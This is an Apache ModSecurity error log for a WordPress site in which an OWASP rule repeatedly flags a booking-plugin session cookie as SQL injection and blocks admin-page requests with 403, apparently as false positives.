[Mon May 11 18:34:39.966301 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFH0WKUxpmnkK7zHyshgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:40.205806 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFIEWKUxpmnkK7zHyshwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:40.206100 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFIEWKUxpmnkK7zHyshwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:40.799781 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFIEWKUxpmnkK7zHyshwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:41.082572 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFIUWKUxpmnkK7zHysiQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:41.082920 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFIUWKUxpmnkK7zHysiQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:41.628988 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFIUWKUxpmnkK7zHysiQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:41.800514 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFIUWKUxpmnkK7zHysigAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:41.800821 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFIUWKUxpmnkK7zHysigAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:42.400735 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFIUWKUxpmnkK7zHysigAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:42.621472 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFIkWKUxpmnkK7zHysjAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:42.621760 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFIkWKUxpmnkK7zHysjAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:42.986827 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFIkWKUxpmnkK7zHysjAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:43.322419 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFI0WKUxpmnkK7zHysjQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:43.322709 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFI0WKUxpmnkK7zHysjQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:43.982656 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFI0WKUxpmnkK7zHysjQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:44.306777 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFJEWKUxpmnkK7zHysjwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:44.307065 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFJEWKUxpmnkK7zHysjwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:44.924672 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFJEWKUxpmnkK7zHysjwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:45.263776 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFJUWKUxpmnkK7zHyskQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:45.264047 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFJUWKUxpmnkK7zHyskQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:45.859008 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFJUWKUxpmnkK7zHyskQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:46.160050 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFJkWKUxpmnkK7zHyskgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:46.160354 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFJkWKUxpmnkK7zHyskgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:46.750815 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFJkWKUxpmnkK7zHyskgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:46.916557 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFJkWKUxpmnkK7zHyskwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:46.916842 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFJkWKUxpmnkK7zHyskwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:47.497706 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFJkWKUxpmnkK7zHyskwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:47.623211 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFJ0WKUxpmnkK7zHyslQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:47.623486 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFJ0WKUxpmnkK7zHyslQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:48.026049 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFJ0WKUxpmnkK7zHyslQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:48.262460 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFKEWKUxpmnkK7zHyslgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:48.262739 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFKEWKUxpmnkK7zHyslgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:48.932584 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFKEWKUxpmnkK7zHyslgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:49.257422 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFKUWKUxpmnkK7zHysmAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:49.257710 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFKUWKUxpmnkK7zHysmAAAARM"], referer: https://rentparadise.fr/wp-login.php
